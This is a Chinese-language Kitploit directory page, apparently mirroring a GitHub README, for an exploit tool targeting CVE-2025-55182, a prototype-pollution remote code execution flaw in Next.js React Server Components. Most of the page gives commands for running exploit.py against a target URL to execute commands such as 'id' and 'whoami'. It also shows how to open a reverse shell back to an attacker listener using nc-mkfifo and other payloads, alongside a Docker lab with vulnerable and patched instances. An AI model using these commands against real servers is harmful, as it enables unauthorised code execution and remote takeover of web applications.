Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/mr-destroyer/cve-2025-55182
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发实验室与实践
GitHubmr-destroyer/cve-2025-55182

CVE-2025-55182

针对 CVE-2025-55182 的漏洞利用工具,通过 Next.js React Server Components 中的原型污染实现远程代码执行,具备命令执行和反弹 Shell 功能。

查看仓库
1天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Next.js React 服务端组件 RCE 漏洞利用

通过原型污染利用 CVE-2025-55182 实现远程代码执行。

安装

root@kitploit:~
uv sync

使用方法

命令执行

root@kitploit:~
source .venv/bin/activate
python3 exploit.py -u https://example.com -c "id"

反弹 Shell

root@kitploit:~
python3 exploit.py -u https://example.com -r -l YOUR_IP -p 4444 -P nc-mkfifo

选项

  • -u, --url: 要检查的 URL/主机(必需)
  • -c, --cmd: 要执行的命令
  • -r, --reverse: 启用反弹 Shell 模式
  • -l, --lhost: 反弹 Shell 的监听主机
  • -p, --lport: 反弹 Shell 的监听端口
  • -P, --payload: 反弹 Shell 载荷类型:nc、nc-mkfifo、sh、perl(默认:nc)
  • --timeout: 请求超时时间(秒,默认:10)
  • 示例

    root@kitploit:~
    # Execute command
    python3 exploit.py -u https://example.com -c "whoami"
    
    # Reverse shell with nc-mkfifo (recommended for Alpine)
    python3 exploit.py -u https://example.com -r -l 172.29.0.1 -p 4444 -P nc-mkfifo
    

    实验环境

    lab/ 目录包含用于测试该漏洞利用的完整 Docker 配置。

    环境搭建

    root@kitploit:~
    cd lab
    docker-compose up -d
    

    这将启动两个服务:

    • vulnerable: 易受攻击的 Next.js 应用程序,端口 3011
    • patched: 已修补的 Next.js 应用程序,端口 3012

    测试

    root@kitploit:~
    # Test on vulnerable instance
    python3 exploit.py -u http://localhost:3011 -c "id"
    
    # Test reverse shell (get gateway IP first)
    GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
    python3 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo
    
    下载工具